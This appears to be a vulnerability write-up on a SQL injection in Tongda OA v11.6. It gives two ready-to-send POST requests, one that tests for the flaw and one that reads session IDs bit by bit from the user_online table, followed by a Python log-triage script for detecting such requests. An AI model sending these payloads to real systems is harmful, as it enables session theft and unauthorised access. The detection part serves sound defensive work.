Tongda OA v11.6 insert SQL injection vulnerability
Vulnerability Description
Tongda OA v11.6 contains a SQL injection vulnerability in its insert parameter; attackers can use it to obtain sensitive information from the database.
Vulnerability Impact
Tongda OA v11.6
Network surveying and mapping
Vulnerability Reproduction
Login page
Send the following request to determine whether the vulnerability is present
POST /general/document/index.php/recv/register/insert HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 77
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER=
A 302 response means the vulnerability is present; a 500 response means it is not.
After confirming that the vulnerability exists, the SessionID can be obtained through SQL injection and used for further attacks
POST /general/document/index.php/recv/register/insert HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 122
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

title)values("'"^exp(if(ascii(substr((select/**/SID/**/from/**/user_online/**/limit/**/0,1),8,1))<66,1,710)))# =1&_SERVER=
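Detection side of the two requests above, as an added example that is not part of the original post: both requests put the SQL in the form field name rather than its value, so a log triage can flag POSTs to this endpoint whose field names are not plain identifiers, and mark a client that receives both 302 and 500 answers to such requests. The record layout, the SAFE_KEY rule, the client addresses and the benign body are assumptions made for the example.

```python
import re
from urllib.parse import parse_qsl

ENDPOINT = "/general/document/index.php/recv/register/insert"  # path from this page
# Assumption: legitimate form field names are plain identifiers.
SAFE_KEY = re.compile(r"^[A-Za-z0-9_\[\]]+$")
# SQL fragments that appear inside the parameter *name* in the requests above.
SQL_HINTS = re.compile(r"values\s*\(|select|/\*\*/|exp\s*\(|substr\s*\(|#", re.I)

def suspicious_keys(body):
    """Field names that are not plain identifiers and carry SQL fragments."""
    keys = [k for k, _ in parse_qsl(body, keep_blank_values=True)]
    return [k for k in keys if not SAFE_KEY.match(k) and SQL_HINTS.search(k)]

def triage(records):
    """records: (client, method, path, status, body) tuples from a proxy/WAF log.
    Returns per-client hit counts, status counts and an 'oracle' flag."""
    out = {}
    for client, method, path, status, body in records:
        if method != "POST" or path.split("?")[0] != ENDPOINT:
            continue
        if not suspicious_keys(body):
            continue
        e = out.setdefault(client, {"hits": 0, "statuses": {}, "oracle": False})
        e["hits"] += 1
        e["statuses"][status] = e["statuses"].get(status, 0) + 1
        # Injected requests answered with both 302 and 500 match the
        # true/false signal described above: data is being read bit by bit.
        e["oracle"] = 302 in e["statuses"] and 500 in e["statuses"]
    return out

# Constructed sample records; bodies 1 and 2 are the two requests shown on this
# page, the addresses, statuses and the benign body are made up for the example.
SAMPLE = [
    ("198.51.100.7", "POST", ENDPOINT, 302,
     'title)values("\'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER='),
    ("198.51.100.7", "POST", ENDPOINT, 500,
     'title)values("\'"^exp(if(ascii(substr((select/**/SID/**/from/**/user_online'
     '/**/limit/**/0,1),8,1))<66,1,710)))# =1&_SERVER='),
    ("192.0.2.10", "POST", ENDPOINT, 302, "title=Quarterly+report&doc_type=1"),
]

if __name__ == "__main__":
    for client, info in triage(SAMPLE).items():
        print(client, info)
```

A run of flagged requests from one client with the oracle flag set is the point at which sessions listed in user_online should be treated as exposed and invalidated.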
This post is licensed under CC BY 4.0 by the author.